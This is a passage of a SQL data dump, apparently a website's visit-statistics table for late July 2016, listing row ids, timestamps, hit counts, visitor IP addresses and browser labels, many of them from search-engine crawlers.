39,1,0,1,0,'66.249.66.185',''),(52995,1469767595,2,0,2,0,'66.249.66.182',''),(52996,1469768809,1,1,0,0,'40.77.167.11','other'),(52997,1469769110,1,0,1,0,'66.249.66.177',''),(52998,1469769249,2,0,2,0,'66.249.66.188',''),(52999,1469769753,1,0,1,0,'66.249.66.183',''),(53000,1469770012,1,1,0,0,'37.55.56.162','firefox'),(53001,1469770021,1,0,1,0,'66.249.66.180',''),(53002,1469770102,1,0,1,0,'66.249.66.182',''),(53003,1469770797,1,1,0,0,'212.55.84.26','chrome'),(53004,1469771107,1,1,0,0,'92.113.29.205','firefox'),(53005,1469771296,1,1,0,0,'51.255.65.60','other'),(53006,1469771378,1,0,1,0,'66.249.66.188',''),(53007,1469771857,1,0,1,0,'66.249.66.182',''),(53008,1469772417,1,1,0,0,'164.132.161.30','other'),(53009,1469772561,1,1,0,0,'94.179.35.235','firefox'),(53010,1469772941,1,1,0,0,'37.54.18.47','chrome'),(53011,1469773039,1,1,0,0,'95.134.203.125','chrome'),(53012,1469773234,1,1,0,0,'178.93.29.188','chrome'),(53013,1469773251,1,1,0,0,'91.196.178.169','chrome'),(53014,1469773277,1,1,0,0,'141.8.142.58','other'),(53015,1469773320,1,1,0,0,'164.132.161.54','other'),(53016,1469773956,1,1,0,0,'164.132.161.87','other'),(53017,1469774776,1,1,0,0,'91.192.135.241','firefox'),(53018,1469774777,2,0,2,0,'66.249.66.188',''),(53019,1469774846,1,1,0,0,'151.80.31.100','other'),(53020,1469775251,1,0,1,0,'66.249.66.183',''),(53021,1469775428,1,0,1,0,'66.249.66.177',''),(53022,1469775847,1,0,1,0,'66.249.66.182',''),(53023,1469775849,1,0,1,0,'66.249.66.185',''),(53024,1469776184,1,1,0,0,'91.208.145.251','chrome'),(53025,1469776960,1,1,0,0,'164.132.161.87','other'),(53026,1469777519,1,0,1,0,'66.249.66.180',''),(53027,1469777706,1,1,0,0,'151.80.31.183','other'),(53028,1469778140,1,1,0,0,'37.73.214.139','other'),(53029,1469778352,1,1,0,0,'91.196.178.68','firefox'),(53030,1469778591,1,1,0,0,'164.132.161.26','other'),(53031,1469778595,1,1,0,0,'180.76.15.136','other'),(53032,1469779452,1,1,0,0,'91.196.178.68','firefox'),(53033,1469779865,1,1,0,0,'91.196.178.70','chrome'),(53034,1469780123,1,1,0,0,'151.80.31.100','other'),(53035,1469780786,1,1,0,0,'52.3.105.23','other'),(53036,1469781035,1,0,1,0,'66.249.66.185',''),(53037,1469781076,1,0,1,0,'66.249.66.182',''),(53038,1469781265,1,0,1,0,'66.249.66.183',''),(53039,1469781273,1,0,1,0,'66.249.66.177',''),(53040,1469781349,1,1,0,0,'91.196.178.72','chrome'),(53041,1469781550,1,0,1,0,'66.249.66.188',''),(53042,1469781556,1,1,0,0,'195.154.185.20','other'),(53043,1469781636,1,1,0,0,'164.132.161.36','other'),(53044,1469781883,1,1,0,0,'91.196.178.168','chrome'),(53045,1469781902,1,1,0,0,'92.52.188.244','chrome'),(53046,1469782230,1,1,0,0,'207.46.13.55','other'),(53047,1469782506,1,0,1,0,'66.249.66.188',''),(53048,1469782520,1,0,1,0,'66.249.66.180',''),(53049,1469783350,1,1,0,0,'91.196.178.68','firefox'),(53050,1469784201,1,0,1,0,'66.249.66.185',''),(53051,1469784211,1,1,0,0,'195.22.108.146','chrome'),(53052,1469784952,1,0,1,0,'66.249.66.177',''),(53053,1469785102,1,1,0,0,'91.196.178.99','chrome'),(53054,1469785589,1,1,0,0,'91.196.178.68','firefox'),(53055,1469785796,1,1,0,0,'37.73.238.162','chrome'),(53056,1469786554,1,1,0,0,'66.249.66.182','chrome'),(53057,1469786664,1,1,0,0,'193.107.72.82','chrome'),(53058,1469787442,1,0,1,0,'66.249.66.177',''),(53059,1469787466,1,1,0,0,'151.80.31.169','other'),(53060,1469787517,1,0,1,0,'66.249.66.188',''),(53061,1469789175,1,1,0,0,'195.22.141.17','chrome'),(53062,1469789345,2,0,2,0,'66.249.66.185',''),(53063,1469789350,2,0,2,0,'66.249.66.182',''),(53064,1469789393,5,5,0,0,'88.198.230.79','other'),(53065,1469789630,1,1,0,0,'91.196.178.71','chrome'),(53066,1469789750,4,4,0,0,'51.254.121.184','other'),(53067,1469790077,1,1,0,0,'52.3.105.23','other'),(53068,1469790389,1,1,0,0,'178.93.148.153','firefox'),(53069,1469790560,2,0,2,0,'66.249.66.182',''),(53070,1469790696,2,0,2,0,'66.249.66.177',''),(53071,1469791016,1,1,0,0,'82.145.209.160','other'),(53072,1469791059,2,2,0,0,'82.207.9.50','chrome'),(53073,1469791257,1,1,0,0,'180.76.15.13','other'),(53074,1469792084,1,1,0,0,'66.249.93.109','chrome'),(53075,1469792518,1,1,0,0,'52.3.105.23','other'),(53076,1469792741,1,1,0,0,'91.196.178.68','chrome'),(53077,1469793591,1,1,0,0,'52.3.105.23','other'),(53078,1469794766,1,0,1,0,'66.249.66.188',''),(53079,1469794900,1,1,0,0,'91.196.177.8','chrome'),(53080,1469795238,1,1,0,0,'46.201.175.47','chrome'),(53081,1469795274,1,1,0,0,'174.129.237.157','other'),(53082,1469795342,2,0,2,0,'66.249.66.185',''),(53083,1469795444,1,1,0,0,'180.76.15.18','other'),(53084,1469795489,1,0,1,0,'66.249.66.180',''),(53085,1469795588,2,0,2,0,'66.249.66.182',''),(53086,1469795877,1,1,0,0,'46.211.114.143','chrome'),(53087,1469796141,1,0,1,0,'66.249.69.187',''),(53088,1469796443,1,0,1,0,'66.249.69.185',''),(53089,1469796539,1,1,0,0,'91.196.179.33','chrome'),(53090,1469796598,2,2,0,0,'174.129.237.157','other'),(53091,1469796776,1,0,1,0,'66.249.66.180',''),(53092,1469796798,1,1,0,0,'91.196.178.98','other'),(53093,1469797269,1,1,0,0,'66.102.9.93','chrome'),(53094,1469797453,1,1,0,0,'180.76.15.19','other'),(53095,1469798639,1,0,1,0,'66.249.66.185',''),(53096,1469799088,1,1,0,0,'174.129.237.157','other'),(53097,1469799187,1,1,0,0,'69.30.234.186','other'),(53098,1469799462,1,1,0,0,'180.76.15.21','other'),(53099,1469801285,1,1,0,0,'174.129.237.157','other'),(53100,1469801803,1,1,0,0,'66.249.66.182','chrome'),(53101,1469801925,1,1,0,0,'66.249.66.183','chrome'),(53102,1469802418,1,1,0,0,'51.255.65.97','other'),(53103,1469803133,1,1,0,0,'174.129.237.157','other'),(53104,1469804490,1,1,0,0,'91.196.178.131','firefox'),(53105,1469804513,1,1,0,0,'46.211.252.145','chrome'),(53106,1469805040,1,1,0,0,'31.134.112.253','opera'),(53107,1469805339,1,1,0,0,'174.129.237.157','other'),(53108,1469805413,1,1,0,0,'91.196.178.68','firefox'),(53109,1469805824,1,1,0,0,'52.3.105.23','other'),(53110,1469806023,1,1,0,0,'51.255.65.15','other'),(53111,1469806153,1,1,0,0,'91.196.178.40','firefox'),(53112,1469807581,1,1,0,0,'91.196.178.135','chrome'),(53113,1469808306,1,1,0,0,'37.73.152.246','other'),(53114,1469809349,1,1,0,0,'91.196.178.102','chrome'),(53115,1469809553,1,1,0,0,'91.124.118.216','firefox'),(53116,1469809851,1,1,0,0,'164.132.161.41','other'),(53117,1469810281,1,0,1,0,'66.249.66.188',''),(53118,1469810645,1,1,0,0,'83.220.239.197','other'),(53119,1469810756,1,1,0,0,'95.135.91.172','chrome'),(53120,1469811177,1,1,0,0,'31.134.112.253','opera'),(53121,1469811488,1,1,0,0,'52.3.105.23','other'),(53122,1469812421,1,0,1,0,'66.249.66.185',''),(53123,1469813393,1,1,0,0,'31.134.112.253','opera'),(53124,1469814051,2,0,2,0,'66.249.66.182',''),(53125,1469814835,1,0,1,0,'66.249.66.188',''),(53126,1469815341,1,0,1,0,'66.249.66.182',''),(53127,1469816094,1,0,1,0,'66.249.66.177',''),(53128,1469816298,1,1,0,0,'91.196.178.70','chrome'),(53129,1469816578,1,0,1,0,'66.249.66.183',''),(53130,1469817031,17,17,0,0,'178.203.120.68','other'),(53131,1469817903,1,1,0,0,'91.124.118.216','firefox'),(53132,1469818358,1,1,0,0,'91.196.178.102','chrome'),(53133,1469818480,1,1,0,0,'91.196.178.162','other'),(53134,1469819077,1,1,0,0,'180.76.15.159','other'),(53135,1469819512,1,1,0,0,'208.115.113.82','other'),(53136,1469819786,1,1,0,0,'37.73.211.213','chrome'),(53137,1469820449,1,1,0,0,'31.134.112.253','opera'),(53138,1469820781,1,0,1,0,'66.249.66.188',''),(53139,1469820934,1,1,0,0,'141.0.14.139','other'),(53140,1469820989,1,0,1,0,'66.249.66.185',''),(53141,1469820998,1,0,1,0,'66.249.66.182',''),(53142,1469821886,1,1,0,0,'31.134.112.253','opera'),(53143,1469821940,1,1,0,0,'66.249.66.177','chrome'),(53144,1469822638,1,0,1,0,'66.249.66.185',''),(53145,1469822913,1,0,1,0,'66.249.66.180',''),(53146,1469823183,1,1,0,0,'94.179.15.251','chrome'),(53147,1469824424,1,0,1,0,'66.249.66.180',''),(53148,1469825406,2,0,2,0,'66.249.66.180',''),(53149,1469826496,6,6,0,0,'89.163.148.22','other'),(53150,1469826606,1,1,0,0,'51.255.65.74','other'),(53151,1469827004,1,0,1,0,'66.249.66.185',''),(53152,1469827176,1,0,1,0,'66.249.66.188',''),(53153,1469828006,1,1,0,0,'180.76.15.137','other'),(53154,1469828097,1,0,1,0,'66.249.66.185',''),(53155,1469830045,1,1,0,0,'164.132.161.6','other'),(53156,1469831974,1,0,1,0,'66.249.66.177',''),(53157,1469832056,1,0,1,0,'66.249.66.188',''),(53158,1469832114,1,0,1,0,'66.249.66.182',''),(53159,1469833889,1,1,0,0,'164.132.161.56','other'),(53160,1469834363,1,0,1,0,'66.249.66.188',''),(53161,1469834401,1,0,1,0,'66.249.66.180',''),(53162,1469834783,1,1,0,0,'176.77.39.85','firefox'),(53165,1469834784,1,1,0,0,'5.164.102.56','msie'),(53166,1469834785,1,1,0,0,'2.93.251.51','msie'),(53167,1469835326,1,1,0,0,'130.193.51.19','other'),(53168,1469835329,1,1,0,0,'141.8.142.58','other'),(53169,1469835942,1,1,0,0,'51.255.65.38','other'),(53170,1469836294,1,1,0,0,'188.255.1.110','msie'),(53171,1469836487,1,0,1,0,'66.249.66.183',''),(53172,1469836558,1,1,0,0,'66.249.66.185','chrome'),(53173,1469837364,1,0,1,0,'66.249.66.182',''),(53174,1469837395,1,1,0,0,'93.158.152.61','other'),(53175,1469837888,1,1,0,0,'51.255.65.78','other'),(53176,1469837908,2,2,0,0,'141.8.183.25','other'),(53177,1469838289,1,0,1,0,'66.249.66.188',''),(53178,1469838508,1,1,0,0,'208.115.113.82','other'),(53179,1469839128,1,1,0,0,'130.193.51.19','other'),(53180,1469839368,1,0,1,0,'66.249.66.182',''),(53181,1469839549,1,0,1,0,'66.249.66.185',''),(53182,1469839806,1,1,0,0,'141.8.142.62','other'),(53183,1469839875,1,1,0,0,'66.249.66.188','chrome'),(53184,1469840291,1,1,0,0,'88.81.48.100','chrome'),(53185,1469840420,1,1,0,0,'141.8.183.19','other'),(53186,1469840669,1,1,0,0,'164.132.161.45','other'),(53187,1469840902,1,1,0,0,'130.193.50.6','other'),(53188,1469840906,1,1,0,0,'141.8.132.30','other'),(53189,1469843248,1,0,1,0,'66.249.66.40',''),(53190,1469843703,1,0,1,0,'66.249.66.54',''),(53191,1469844054,1,0,1,0,'66.249.66.60',''),(53192,1469845460,1,1,0,0,'130.193.51.14','other'),(53193,1469845464,1,1,0,0,'130.193.50.32','other'),(53194,1469846582,1,1,0,0,'93.158.152.40','other'),(53195,1469846887,1,1,0,0,'151.80.31.156','other'),(53196,1469847052,1,1,0,0,'141.8.142.58','other'),(53197,1469847144,1,0,1,0,'66.249.66.40',''),(53198,1469847707,1,1,0,0,'128.72.209.127','msie'),(53199,1469847708,1,1,0,0,'77.37.197.178','msie'),(53200,1469847709,1,1,0,0,'176.77.12.104','msie'),(53201,1469847710,1,1,0,0,'2.93.236.138','msie'),(53202,1469847833,1,1,0,0,'51.255.65.35','other'),(53203,1469849494,1,1,0,0,'51.255.65.83','other'),(53204,1469849815,2,1,1,0,'66.249.64.185',''),(53205,1469850064,1,0,1,0,'66.249.64.187',''),(53206,1469850625,1,0,1,0,'66.249.64.152',''),(53207,1469851941,1,1,0,0,'164.132.161.56','other'),(53208,1469852833,1,1,0,0,'212.55.84.26','chrome'),(53209,1469852881,1,0,1,0,'66.249.64.149',''),(53210,1469854044,1,0,1,0,'66.249.64.152',''),(53211,1469854104,1,1,0,0,'207.46.13.133','other'),(53212,1469854450,1,1,0,0,'141.0.14.70','other'),(53213,1469854643,2,2,0,0,'141.8.183.25','other'),(53214,1469854699,1,1,0,0,'141.8.142.61','other'),(53215,1469854743,1,1,0,0,'93.158.152.84','other'),(53216,1469854785,1,1,0,0,'141.8.142.58','other'),(53217,1469854833,1,1,0,0,'130.193.50.34','other'),(53218,1469855563,1,0,1,0,'66.249.64.189',''),(53219,1469856501,3,0,3,0,'66.249.64.149',''),(53220,1469857028,1,1,0,0,'141.8.132.41','other'),(53221,1469857082,1,1,0,0,'141.8.142.58','other'),(53222,1469857656,1,0,1,0,'66.249.64.185',''),(53223,1469858495,1,1,0,0,'141.8.142.61','other'),(53224,1469858608,1,1,0,0,'51.255.65.68','other'),(53225,1469858756,1,1,0,0,'208.115.113.92','other'),(53226,1469859313,2,0,2,0,'66.249.64.187',''),(53227,1469859477,2,0,2,0,'66.249.64.152',''),(53228,1469859480,2,0,2,0,'66.249.64.155',''),(53229,1469859483,9,0,9,0,'66.249.64.149',''),(53230,1469859510,1,0,1,0,'66.249.64.189',''),(53231,1469860323,1,0,1,0,'66.249.64.185',''),(53232,1469860550,1,0,1,0,'66.249.64.187',''),(53233,1469860576,1,1,0,0,'216.145.17.190','firefox'),(53234,1469860672,2,0,2,0,'66.249.64.189',''),(53235,1469860860,1,1,0,0,'164.132.161.21','other'),(53236,1469860919,1,1,0,0,'180.76.15.20','other'),(53237,1469861318,2,0,2,0,'66.249.64.152',''),(53238,1469861344,1,0,1,0,'66.249.64.155',''),(53239,1469861386,2,0,2,0,'66.249.64.149',''),(53240,1469861590,1,1,0,0,'141.8.142.58','other'),(53241,1469861659,1,1,0,0,'130.193.50.34','other'),(53242,1469861759,1,1,0,0,'51.255.65.62','other'),(53243,1469862067,2,0,2,0,'66.249.64.187',''),(53244,1469862566,1,0,1,0,'66.249.64.189',''),(53245,1469863188,1,0,1,0,'66.249.64.187',''),(53246,1469863322,1,0,1,0,'66.249.64.155',''),(53247,1469863327,2,0,2,0,'66.249.64.152',''),(53248,1469863369,2,0,2,0,'66.249.64.149',''),(53249,1469863764,1,0,1,0,'66.249.64.185',''),(53250,1469864293,2,2,0,0,'141.8.183.25','other'),(53251,1469864526,1,1,0,0,'141.8.142.61','other'),(53252,1469864887,1,1,0,0,'91.196.178.34','chrome'),(53253,1469866921,1,0,1,0,'66.249.64.152',''),(53254,1469868160,1,1,0,0,'51.255.65.45','other'),(53255,1469868419,1,0,1,0,'66.249.64.185',''),(53256,1469869964,1,1,0,0,'195.49.151.242','chrome'),(53257,1469870358,1,1,0,0,'130.180.220.31','chrome'),(53258,1469870398,1,1,0,0,'37.73.137.186','chrome'),(53259,1469870747,1,1,0,0,'208.115.113.92','other'),(53260,1469871058,1,0,1,0,'66.249.64.149',''),(53261,1469871166,1,0,1,0,'66.249.64.185',''),(53262,1469871241,1,0,1,0,'66.249.64.187',''),(53263,1469872720,1,1,0,0,'51.255.65.79','other'),(53264,1469872771,1,1,0,0,'208.115.113.92','other'),(53265,1469872995,2,0,2,0,'66.249.64.185',''),(53266,1469873053,1,1,0,0,'164.132.161.35','other'),(53267,1469873502,1,1,0,0,'91.196.178.100','chrome'),(53268,1469873585,2,2,0,0,'141.8.183.25','other'),(53269,1469873646,1,1,0,0,'130.193.51.19','other'),(53270,1469874152,1,1,0,0,'208.115.113.82','other'),(53271,1469874798,1,0,1,0,'66.249.64.149',''),(53272,1469875811,1,1,0,0,'130.193.51.19','other'),(53273,1469875868,1,1,0,0,'130.193.50.34','other'),(53274,1469875995,1,0,1,0,'66.249.64.149',''),(53275,1469876021,1,0,1,0,'66.249.64.152',''),(53276,1469877027,1,1,0,0,'66.249.88.103','chrome'),(53277,1469877060,1,0,1,0,'66.249.64.155',''),(53278,1469877080,1,0,1,0,'66.249.64.185',''),(53279,1469877534,1,1,0,0,'130.180.219.29','chrome'),(53280,1469877745,1,1,0,0,'164.132.161.92','other'),(53281,1469877871,2,2,0,0,'130.193.51.19','other'),(53282,1469877996,1,1,0,0,'93.158.152.84','other'),(53283,1469878124,2,2,0,0,'130.193.50.34','other'),(53284,1469878186,1,1,0,0,'66.249.64.187','chrome'),(53285,1469878505,1,1,0,0,'141.8.142.61','other'),(53286,1469879842,1,1,0,0,'141.8.142.67','other'),(53287,1469879935,1,1,0,0,'180.76.15.140','other'),(53288,1469880051,1,1,0,0,'93.158.152.84','other'),(53289,1469880195,1,1,0,0,'164.132.161.91','other'),(53290,1469880414,1,0,1,0,'66.249.64.189',''),(53292,1469880517,1,1,0,0,'93.158.152.40','other'),(53293,1469880609,2,2,0,0,'78.111.187.82','chrome'),(53294,1469880723,1,0,1,0,'66.249.64.152',''),(53295,1469880915,1,1,0,0,'89.145.95.40','other'),(53296,1469881362,1,1,0,0,'157.55.39.13','other'),(53297,1469881944,1,1,0,0,'180.76.15.140','other'),(53298,1469881980,7,7,0,0,'51.255.48.154','other'),(53299,1469881990,1,1,0,0,'141.8.183.25','other'),(53300,1469882009,1,1,0,0,'46.211.65.228','chrome'),(53301,1469882235,2,2,0,0,'141.8.142.58','other'),(53302,1469883160,1,1,0,0,'66.249.64.185','chrome'),(53303,1469884092,1,0,1,0,'66.249.64.149',''),(53304,1469884294,1,1,0,0,'141.8.142.67','other'),(53305,1469884354,1,0,1,0,'66.249.64.155',''),(53306,1469884482,2,2,0,0,'141.8.142.58','other'),(53307,1469884609,1,1,0,0,'130.193.50.34','other'),(53308,1469884735,2,2,0,0,'141.8.183.25','other'),(53309,1469885424,1,0,1,0,'66.249.64.185',''),(53310,1469885575,1,1,0,0,'151.80.31.106','other'),(53311,1469885983,1,0,1,0,'66.249.64.149',''),(53312,1469886205,1,1,0,0,'164.132.161.16','other'),(53313,1469886289,1,0,1,0,'68.180.230.111',''),(53314,1469886394,1,1,0,0,'141.8.142.58','other'),(53315,1469886637,1,0,1,0,'66.249.64.152',''),(53316,1469886779,1,1,0,0,'91.196.178.40','firefox'),(53317,1469887100,1,1,0,0,'141.8.183.25','other'),(53318,1469887148,19,19,0,0,'51.255.207.3','other'),(53319,1469887715,28,28,0,0,'144.76.8.132','other'),(53320,1469888248,1,1,0,0,'157.55.39.28','other'),(53321,1469889068,1,0,1,0,'66.249.64.187',''),(53322,1469889072,1,1,0,0,'174.129.237.157','other'),(53323,1469889360,1,1,0,0,'141.8.142.67','other'),(53324,1469889663,2,2,0,0,'141.8.183.25','other'),(53325,1469889778,1,1,0,0,'130.193.51.19','other'),(53326,1469890121,1,0,1,0,'66.249.64.185',''),(53327,1469890402,1,0,1,0,'66.249.64.152',''),(53328,1469890502,2,2,0,0,'130.193.50.34','other'),(53329,1469890546,1,1,0,0,'141.8.142.67','other'),(53330,1469890684,1,0,1,0,'66.249.64.149',''),(53331,1469890755,1,1,0,0,'130.193.51.19','other'),(53332,1469892083,1,1,0,0,'174.129.237.157','other'),(53333,1469892777,1,1,0,0,'91.196.178.97','chrome'),(53334,1469892838,1,0,1,0,'66.249.64.187',''),(53335,1469893443,1,1,0,0,'164.132.161.23','other'),(53336,1469893539,1,1,0,0,'141.8.142.67','other'),(53337,1469893563,1,1,0,0,'151.80.31.180','other'),(53338,1469893727,1,1,0,0,'91.196.178.97','chrome'),(53339,1469893752,1,1,0,0,'130.193.50.34','other'),(53340,1469893824,2,2,0,0,'141.8.183.25','other'),(53341,1469893895,1,1,0,0,'130.193.51.19','other'),(53342,1469893990,1,1,0,0,'141.8.142.58','other'),(53343,1469894892,1,1,0,0,'174.129.237.157','other'),(53344,1469895058,1,1,0,0,'164.132.161.71','other'),(53345,1469895279,1,1,0,0,'93.115.95.206','chrome'),(53346,1469896341,1,1,0,0,'164.132.161.58','other'),(53347,1469896366,1,1,0,0,'157.55.39.28','other'),(53348,1469896949,1,1,0,0,'208.115.113.82','other'),(53349,1469897177,2,2,0,0,'141.8.183.25','other'),(53350,1469897302,1,1,0,0,'141.8.142.61','other'),(53351,1469897510,2,2,0,0,'130.193.50.34','other'),(53352,1469898249,1,0,1,0,'66.249.64.149',''),(53353,1469898472,1,0,1,0,'66.249.64.155',''),(53354,1469898522,1,1,0,0,'91.196.178.97','chrome'),(53355,1469898555,1,0,1,0,'66.249.64.189',''),(53356,1469898679,1,1,0,0,'66.249.64.185','chrome'),(53357,1469898777,1,1,0,0,'66.249.64.140','chrome'),(53358,1469898895,1,0,1,0,'66.249.64.187',''),(53359,1469901182,1,1,0,0,'78.111.189.174','chrome'),(53360,1469901200,1,1,0,0,'151.80.31.157','other'),(53361,1469902409,1,1,0,0,'91.196.178.97','chrome'),(53362,1469902461,1,1,0,0,'51.255.65.51','other'),(53363,1469902720,1,1,0,0,'151.80.31.159','other'),(53364,1469903672,1,1,0,0,'91.196.178.97','chrome'),(53365,1469903910,1,1,0,0,'212.55.75.115','chrome'),(53366,1469904232,1,1,0,0,'66.249.64.187','chrome'),(53367,1469905004,1,1,0,0,'78.111.189.174','chrome'),(53368,1469905743,1,1,0,0,'208.115.113.92','other'),(53369,1469906718,1,0,1,0,'66.249.64.185',''),(53370,1469907048,1,1,0,0,'151.80.31.184','other'),(53371,1469908545,1,1,0,0,'151.80.31.173','other'),(53372,1469909001,1,1,0,0,'31.202.168.59','chrome'),(53373,1469909529,1,0,1,0,'66.249.64.187',''),(53374,1469910262,1,1,0,0,'91.196.178.97','chrome'),(53375,1469911592,1,1,0,0,'178.154.149.10','other'),(53376,1469911723,1,1,0,0,'141.8.142.58','other'),(53377,1469912736,1,1,0,0,'180.76.15.33','other'),(53378,1469913272,1,1,0,0,'176.214.109.179','opera'),(53379,1469913706,1,1,0,0,'46.242.81.202','firefox'),(53380,1469913938,1,1,0,0,'178.140.10.158','chrome'),(53381,1469913972,1,1,0,0,'46.242.52.104','msie'),(53382,1469914404,2,2,0,0,'141.8.183.25','other'),(53383,1469914531,1,1,0,0,'93.158.152.84','other'),(53384,1469914657,2,2,0,0,'130.193.51.74','other'),(53385,1469914719,1,0,1,0,'66.249.64.185',''),(53386,1469915183,1,1,0,0,'208.115.113.92','other'),(53387,1469915563,1,1,0,0,'128.72.209.127','msie'),(53388,1469916627,1,0,1,0,'66.249.64.155',''),(53389,1469918922,1,0,1,0,'66.249.64.189',''),(53390,1469920704,1,0,1,0,'66.249.64.189',''),(53391,1469920834,1,1,0,0,'157.55.39.28','other'),(53392,1469921777,1,1,0,0,'62.210.250.212','other'),(53393,1469922406,1,0,1,0,'66.249.64.149',''),(53394,1469922933,1,1,0,0,'207.46.13.153','other'),(53395,1469923905,1,1,0,0,'66.249.64.187','chrome'),(53396,1469924803,1,0,1,0,'66.249.64.149',''),(53397,1469926260,1,0,1,0,'66.249.64.155',''),(53398,1469926600,1,1,0,0,'51.255.65.27','other'),(53399,1469926888,1,1,0,0,'130.193.50.34','other'),(53400,1469926892,1,1,0,0,'93.158.152.84','other'),(53401,1469927318,2,2,0,0,'5.9.62.130','other'),(53402,1469929242,3,3,0,0,'209.126.127.49','other'),(53403,1469929641,1,1,0,0,'164.132.161.86','other'),(53404,1469930332,1,1,0,0,'208.115.113.92','other'),(53405,1469930530,1,1,0,0,'151.80.31.178','other'),(53406,1469930661,1,1,0,0,'164.132.161.9','other'),(53407,1469930762,2,1,1,0,'66.249.64.189',''),(53408,1469932193,1,1,0,0,'66.249.64.189','chrome'),(53409,1469932319,1,0,1,0,'66.249.64.187',''),(53410,1469932475,1,1,0,0,'51.255.65.61','other'),(53411,1469932743,1,1,0,0,'188.255.27.50','msie'),(53412,1469933294,1,1,0,0,'66.249.64.185','chrome'),(53413,1469933377,1,1,0,0,'51.254.131.243','other'),(53414,1469933474,1,0,1,0,'66.249.64.189',''),(53415,1469934761,1,1,0,0,'164.132.161.82','other'),(53416,1469934776,1,0,1,0,'66.249.64.187',''),(53417,1469935411,1,1,0,0,'51.255.65.86','other'),(53418,1469936869,1,1,0,0,'208.115.113.82','other'),(53419,1469937729,1,1,0,0,'208.115.113.92','other'),(53420,1469938512,1,0,1,0,'66.249.64.185',''),(53421,1469938747,1,1,0,0,'51.255.65.33','other'),(53422,1469939590,1,0,1,0,'66.249.64.189',''),(53423,1469940783,1,0,1,0,'66.249.64.155',''),(53424,1469942186,1,1,0,0,'164.132.161.91','other'),(53425,1469943066,1,0,1,0,'66.249.64.149',''),(53426,1469943964,1,0,1,0,'66.249.64.185',''),(53427,1469943981,1,0,1,0,'66.249.64.155',''),(53428,1469945176,1,0,1,0,'66.249.64.189',''),(53429,1469946093,2,0,2,0,'66.249.64.189',''),(53430,1469946650,1,0,1,0,'66.249.64.185',''),(53431,1469946834,1,1,0,0,'66.249.93.117','chrome'),(53432,1469946980,1,1,0,0,'176.77.90.85','other'),(53433,1469947128,1,1,0,0,'51.255.65.10','other'),(53434,1469949012,1,1,0,0,'91.196.178.130','other'),(53435,1469949246,1,0,1,0,'66.249.64.189',''),(53436,1469949885,1,1,0,0,'5.255.253.26','other'),(53437,1469949890,1,1,0,0,'130.193.51.79','other'),(53438,1469951240,1,0,1,0,'66.249.64.185',''),(53439,1469951284,1,1,0,0,'208.115.113.92','other'),(53440,1469951555,1,1,0,0,'180.76.15.161','other'),(53441,1469952034,1,1,0,0,'93.158.152.46','other'),(53442,1469952129,1,1,0,0,'51.255.65.96','other'),(53443,1469953150,1,0,1,0,'66.249.64.187',''),(53444,1469953245,1,1,0,0,'141.8.142.58','other'),(53445,1469954045,1,1,0,0,'164.132.161.31','other'),(53446,1469954268,1,0,1,0,'66.249.64.152',''),(53447,1469954547,1,1,0,0,'54.175.86.33','chrome'),(53448,1469955028,1,1,0,0,'141.8.183.25','other'),(53449,1469955056,3,3,0,0,'130.193.50.34','other'),(53450,1469956845,2,2,0,0,'141.8.142.58','other'),(53451,1469956975,1,1,0,0,'141.8.142.61','other'),(53452,1469957437,1,1,0,0,'51.255.65.69','other'),(53453,1469958341,1,1,0,0,'51.255.65.54','other'),(53454,1469958462,2,2,0,0,'130.180.218.63','chrome'),(53455,1469959123,1,1,0,0,'198.148.15.20','other'),(53456,1469959537,1,1,0,0,'141.8.142.41','other'),(53457,1469959738,1,1,0,0,'91.196.178.130','other'),(53458,1469960148,1,1,0,0,'208.115.113.82','other'),(53459,1469960464,1,1,0,0,'141.8.142.67','other'),(53460,1469960738,1,1,0,0,'93.158.152.40','other'),(53461,1469961017,1,1,0,0,'130.193.51.19','other'),(53462,1469961021,1,1,0,0,'5.255.253.68','other'),(53463,1469961640,2,1,1,0,'66.249.64.187',''),(53464,1469961674,1,1,0,0,'151.80.31.174','other'),(53465,1469961954,1,1,0,0,'51.255.65.59','other'),(53466,1469962052,1,1,0,0,'78.111.189.43','chrome'),(53467,1469962656,1,1,0,0,'130.193.37.21','other'),(53468,1469962658,1,1,0,0,'78.46.50.246','other'),(53469,1469962659,1,1,0,0,'130.193.50.34','other'),(53470,1469962795,1,1,0,0,'93.158.152.46','other'),(53471,1469963280,5,5,0,0,'173.234.159.250','other'),(53472,1469963482,1,1,0,0,'151.80.31.171','other'),(53473,1469964107,1,1,0,0,'51.255.65.91','other'),(53474,1469964186,1,1,0,0,'164.132.161.89','other'),(53475,1469965995,1,1,0,0,'157.55.39.13','other'),(53476,1469966189,1,1,0,0,'208.115.113.92','other'),(53477,1469967126,1,1,0,0,'164.132.161.12','other'),(53478,1469967201,1,0,1,0,'66.249.64.155',''),(53479,1469967219,1,1,0,0,'180.76.15.31','other'),(53480,1469968041,1,1,0,0,'37.52.17.191','other'),(53481,1469969229,1,1,0,0,'180.76.15.18','other'),(53482,1469972791,1,0,1,0,'66.249.64.155',''),(53483,1469972941,1,1,0,0,'91.196.178.167','chrome'),(53484,1469973243,1,1,0,0,'51.255.65.71','other'),(53485,1469974099,1,0,1,0,'66.249.64.185',''),(53486,1469974320,1,1,0,0,'164.132.161.9','other'),(53487,1469974896,1,1,0,0,'151.80.31.169','other'),(53488,1469975093,1,1,0,0,'51.255.65.20','other'),(53489,1469975909,4,4,0,0,'78.46.50.246','other'),(53490,1469976055,1,1,0,0,'151.80.31.160','other'),(53491,1469976256,4,4,0,0,'144.76.4.148','other'),(53492,1469976755,1,1,0,0,'157.55.39.28','other'),(53493,1469976879,1,1,0,0,'164.132.161.5','other'),(53494,1469978145,1,0,1,0,'66.249.64.155',''),(53495,1469978544,1,1,0,0,'180.76.15.160','other'),(53496,1469978989,1,1,0,0,'37.221.129.183','chrome'),(53497,1469979564,1,1,0,0,'151.80.31.171','other'),(53498,1469980405,1,1,0,0,'51.255.65.72','other'),(53499,1469980605,1,1,0,0,'66.249.64.189','chrome'),(53500,1469981124,1,1,0,0,'208.115.113.92','other'),(53501,1469981397,30,30,0,0,'144.76.61.21','other'),(53502,1469981410,1,1,0,0,'212.55.85.134','chrome'),(53503,1469982568,1,1,0,0,'180.76.15.158','other'),(53504,1469982839,1,0,1,0,'66.249.64.187',''),(53505,1469982914,2,0,2,0,'66.249.64.189',''),(53506,1469982923,4,0,4,0,'66.249.64.185',''),(53507,1469983675,1,1,0,0,'66.249.64.189','chrome'),(53508,1469984333,2,2,0,0,'136.243.152.18','other'),(53509,1469984830,2,0,2,0,'66.249.64.152',''),(53510,1469985177,2,0,2,0,'66.249.64.149',''),(53511,1469985880,1,0,1,0,'66.249.64.155',''),(53512,1469986001,1,1,0,0,'164.132.161.